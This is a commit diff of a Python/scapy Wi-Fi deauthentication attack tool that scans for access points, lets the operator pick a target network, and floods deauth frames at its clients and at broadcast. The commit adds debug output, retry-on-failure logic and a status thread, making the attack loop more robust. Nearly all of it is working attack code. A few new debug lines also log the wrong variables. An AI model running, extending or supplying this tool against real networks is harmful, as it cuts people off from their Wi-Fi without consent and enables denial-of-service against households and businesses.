1
1
#!/usr/bin/env python3
2
2
3
- import sys
3
+ import sys # leave it
4
4
import signal
5
5
import logging
6
6
import argparse
7
+ import threading # leave it
7
8
8
9
from scapy .layers .dot11 import RadioTap , Dot11Elt , Dot11Beacon , Dot11ProbeResp , Dot11ReassoResp , Dot11AssoResp , \
9
10
Dot11QoS , Dot11Deauth , Dot11
35
36
36
37
class Interceptor :
37
38
_ABORT = False
39
+ _PRINT_STATS_INTV = 1
40
+ _DEAUTH_INTV = 0.100 # 100[ms]
41
+ _CH_SNIFF_TO = 2
42
+ _SSID_STR_PAD = 42 # total len 80
38
43
39
44
def __init__ (self , net_iface , skip_monitor_mode_setup , kill_networkmanager ,
40
- ssid_name , bssid_addr , custom_client_macs , custom_channels , autostart ):
45
+ ssid_name , bssid_addr , custom_client_macs , custom_channels , autostart , debug_mode ):
41
46
self .interface = net_iface
42
- self ._channel_sniff_timeout = 2
43
- self ._scan_intv = 0.1
44
- self ._deauth_intv = 0.1
45
- self ._printf_res_intv = 1
46
- self ._ssid_str_pad = 42 # total len 80
47
+
48
+ self ._max_consecutive_failed_send_lim = 5 / Interceptor ._DEAUTH_INTV # fails to send for 5 consecutive seconds
47
49
48
50
self ._current_channel_num = None
49
51
self ._current_channel_aps = set ()
50
52
51
53
self .attack_loop_count = 0
52
54
53
55
self .target_ssid : Union [SSID , None ] = None
56
+ self ._debug_mode = debug_mode
54
57
55
58
if not skip_monitor_mode_setup :
56
59
print_info (f"Setting up monitor mode..." )
@@ -67,14 +70,18 @@ def __init__(self, net_iface, skip_monitor_mode_setup, kill_networkmanager,
67
70
print_error (f"Failed to kill NetworkManager..." )
68
71
69
72
self ._channel_range = {channel : defaultdict (dict ) for channel in self ._get_channels ()}
73
+ self .log_debug (f"Supported channels: { [c for c in self ._channel_range .keys ()]} " )
70
74
self ._all_ssids : Dict [BandType , Dict [str , SSID ]] = {band : dict () for band in BandType }
71
-
72
75
self ._custom_ssid_name : Union [str , None ] = self .parse_custom_ssid_name (ssid_name )
76
+ self .log_debug (f"Selected custom ssid name: { self ._custom_ssid_name } " )
73
77
self ._custom_bssid_addr : Union [str , None ] = self .parse_custom_bssid_addr (bssid_addr )
78
+ self .log_debug (f"Selected custom bssid addr: { self ._custom_ssid_name } " )
74
79
self ._custom_target_client_mac : Union [List [str ], None ] = self .parse_custom_client_mac (custom_client_macs )
80
+ self .log_debug (f"Selected arget client mac addrs: { self ._custom_target_client_mac } " )
75
81
self ._custom_target_ap_channels : List [int ] = self .parse_custom_channels (custom_channels )
76
- self ._custom_target_ap_last_ch = 0 # to avoid overlapping
82
+ self .log_debug ( f"Selected target client channels: { self . _custom_target_client_mac } " )
77
83
84
+ self ._custom_target_ap_last_ch = 0 # to avoid overlapping
78
85
self ._midrun_output_buffer : List [str ] = list ()
79
86
self ._midrun_output_lck = threading .RLock ()
80
87
@@ -193,7 +200,6 @@ def _scan_channels_for_aps(self):
193
200
print_info (f"Starting AP scan, please wait... ({ len (channels_to_scan )} channels total)" )
194
201
if self ._custom_ssid_name_is_set ():
195
202
print_info (f"Scanning for target SSID -> { self ._custom_ssid_name } " )
196
-
197
203
try :
198
204
for idx , ch_num in enumerate (channels_to_scan ):
199
205
if self ._custom_ssid_name_is_set () and self ._found_custom_ssid_name () \
@@ -203,7 +209,7 @@ def _scan_channels_for_aps(self):
203
209
self ._set_channel (ch_num )
204
210
print_info (f"Scanning channel { self ._current_channel_num } (left -> "
205
211
f"{ len (channels_to_scan ) - (idx + 1 )} )" , end = "\r " )
206
- sniff (prn = self ._ap_sniff_cb , iface = self .interface , timeout = self . _channel_sniff_timeout ,
212
+ sniff (prn = self ._ap_sniff_cb , iface = self .interface , timeout = Interceptor . _CH_SNIFF_TO ,
207
213
stop_filter = lambda p : Interceptor ._ABORT is True )
208
214
finally :
209
215
printf ("" )
@@ -242,9 +248,7 @@ def _start_initial_ap_scan(self) -> SSID:
242
248
pref = f"[{ BOLD } { YELLOW } { str (ctr ).rjust (3 , ' ' )} { RESET } ] "
243
249
printf (f"{ pref } { self ._generate_ssid_str (ssid_obj .name , ssid_obj .channel , ssid_obj .mac_addr , preflen )} " )
244
250
if not target_map :
245
- print_error ("Not APs were found, quitting..." )
246
- Interceptor ._ABORT = True
247
- exit (0 )
251
+ Interceptor .abort_run ("Not APs were found, quitting..." )
248
252
249
253
printf (DELIM )
250
254
@@ -269,7 +273,7 @@ def _start_initial_ap_scan(self) -> SSID:
269
273
return target_map [chosen ]
270
274
271
275
def _generate_ssid_str (self , ssid , ch , mcaddr , preflen ):
272
- return f"{ ssid .ljust (self . _ssid_str_pad - preflen , ' ' )} { str (ch ).ljust (3 , ' ' ).ljust (self . _ssid_str_pad // 2 , ' ' )} { mcaddr } "
276
+ return f"{ ssid .ljust (Interceptor . _SSID_STR_PAD - preflen , ' ' )} { str (ch ).ljust (3 , ' ' ).ljust (Interceptor . _SSID_STR_PAD // 2 , ' ' )} { mcaddr } "
273
277
274
278
def _clients_sniff_cb (self , pkt ):
275
279
try :
@@ -314,18 +318,23 @@ def _run_deauther(self):
314
318
try :
315
319
print_info (f"Starting de-auth loop..." )
316
320
321
+ failed_attempts_ctr = 0
317
322
ap_mac = self .target_ssid .mac_addr
318
323
while not Interceptor ._ABORT :
319
- self .attack_loop_count += 1
320
- for client_mac in self ._get_target_clients ():
321
- self ._send_deauth_client (ap_mac , client_mac )
322
- if not self ._custom_target_client_mac :
323
- self ._send_deauth_broadcast (ap_mac )
324
- sleep (self ._deauth_intv )
324
+ try :
325
+ self .attack_loop_count += 1
326
+ for client_mac in self ._get_target_clients ():
327
+ self ._send_deauth_client (ap_mac , client_mac )
328
+ if not self ._custom_target_client_mac :
329
+ self ._send_deauth_broadcast (ap_mac )
330
+ failed_attempts_ctr = 0 # reset counter
331
+ except Exception as exc :
332
+ failed_attempts_ctr += 1
333
+ if failed_attempts_ctr >= self ._max_consecutive_failed_send_lim :
334
+ raise exc
335
+ sleep (Interceptor ._DEAUTH_INTV ) # if exception - sleep to throttle down
325
336
except Exception as exc :
326
- print_error (f"Exception in deauth-loop -> { traceback .format_exc ()} " )
327
- Interceptor ._ABORT = True
328
- exit (0 )
337
+ Interceptor .abort_run (f"Exception '{ exc } ' in deauth-loop -> { traceback .format_exc ()} " )
329
338
330
339
def _send_deauth_client (self , ap_mac : str , client_mac : str ):
331
340
sendp (RadioTap () /
@@ -351,30 +360,48 @@ def run(self):
351
360
self ._set_channel (ssid_ch )
352
361
353
362
printf (f"{ DELIM } \n " )
354
- for action in [self ._run_deauther , self ._listen_for_clients ]:
355
- t = Thread (target = action , args = tuple (), daemon = True )
363
+
364
+ threads = list ()
365
+ for action in [self ._run_deauther , self ._listen_for_clients , self .report_status ]:
366
+ t = Thread (target = action , args = tuple ())
356
367
t .start ()
368
+ threads .append (t )
357
369
370
+ for t in threads :
371
+ t .join ()
372
+
373
+ def report_status (self ):
358
374
start = get_time ()
359
375
printf (f"{ DELIM } \n " )
360
376
361
377
while not Interceptor ._ABORT :
362
378
buffer_sz = self ._print_midrun_output ()
363
379
print_info (f"Target SSID{ self .target_ssid .name .rjust (80 - 15 , ' ' )} " )
364
- print_info (f"Channel{ str (ssid_ch ).rjust (80 - 11 , ' ' )} " )
380
+ print_info (f"Channel{ str (self . _current_channel_num ).rjust (80 - 11 , ' ' )} " )
365
381
print_info (f"MAC addr{ self .target_ssid .mac_addr .rjust (80 - 12 , ' ' )} " )
366
382
print_info (f"Net interface{ self .interface .rjust (80 - 17 , ' ' )} " )
367
383
print_info (f"Target clients{ BOLD } { str (len (self ._get_target_clients ())).rjust (80 - 18 , ' ' )} { RESET } " )
368
384
print_info (f"Elapsed sec { BOLD } { str (get_time () - start ).rjust (80 - 16 , ' ' )} { RESET } " )
369
- sleep (self ._printf_res_intv )
385
+ sleep (Interceptor ._PRINT_STATS_INTV )
386
+ if Interceptor ._ABORT : # might change while sleeping
387
+ break
370
388
clear_line (7 + buffer_sz )
371
389
390
+ def log_debug (self , msg : str ):
391
+ if self ._debug_mode :
392
+ print_debug (msg )
393
+
394
+ @staticmethod
395
+ def user_abort (* _ ):
396
+ Interceptor .abort_run (f"User asked to stop, quitting..." )
397
+
372
398
@staticmethod
373
- def user_abort ( * args ):
374
- if not Interceptor ._ABORT :
399
+ def abort_run ( msg : str ):
400
+ if not Interceptor ._ABORT : # thread-safe due to GIL
375
401
Interceptor ._ABORT = True
402
+ sleep (Interceptor ._PRINT_STATS_INTV * 1.1 ) # let prints finish
376
403
printf (f"{ DELIM } " )
377
- print_error (f"User asked to stop, quitting..." )
404
+ print_error (msg )
378
405
exit (0 )
379
406
380
407
@@ -392,7 +419,6 @@ def main():
392
419
393
420
if "linux" not in sys .platform :
394
421
raise Exception (f"Unsupported operating system { sys .platform } , only linux is supported..." )
395
-
396
422
397
423
parser = argparse .ArgumentParser (description = 'A simple program to perform a deauth attack' )
398
424
parser .add_argument ('-i' , '--iface' , help = 'a network interface with monitor mode enabled (i.e -> "eth0")' ,
@@ -412,6 +438,8 @@ def main():
412
438
metavar = "ch1,ch2" , action = 'store' , default = None , dest = "custom_channels" , required = False )
413
439
parser .add_argument ('-a' , '--autostart' , help = 'autostart the de-auth loop (if the scan result contains a single access point)' ,
414
440
action = 'store_true' , default = False , dest = "autostart" , required = False )
441
+ parser .add_argument ('-d' , '--debug' , help = 'enable debug prints' ,
442
+ action = 'store_true' , default = False , dest = "debug_mode" , required = False )
415
443
pargs = parser .parse_args ()
416
444
417
445
invalidate_print () # after arg parsing
@@ -422,7 +450,8 @@ def main():
422
450
bssid_addr = pargs .custom_bssid ,
423
451
custom_client_macs = pargs .custom_client_macs ,
424
452
custom_channels = pargs .custom_channels ,
425
- autostart = pargs .autostart )
453
+ autostart = pargs .autostart ,
454
+ debug_mode = pargs .debug_mode )
426
455
attacker .run ()
427
456
428
457
0 commit comments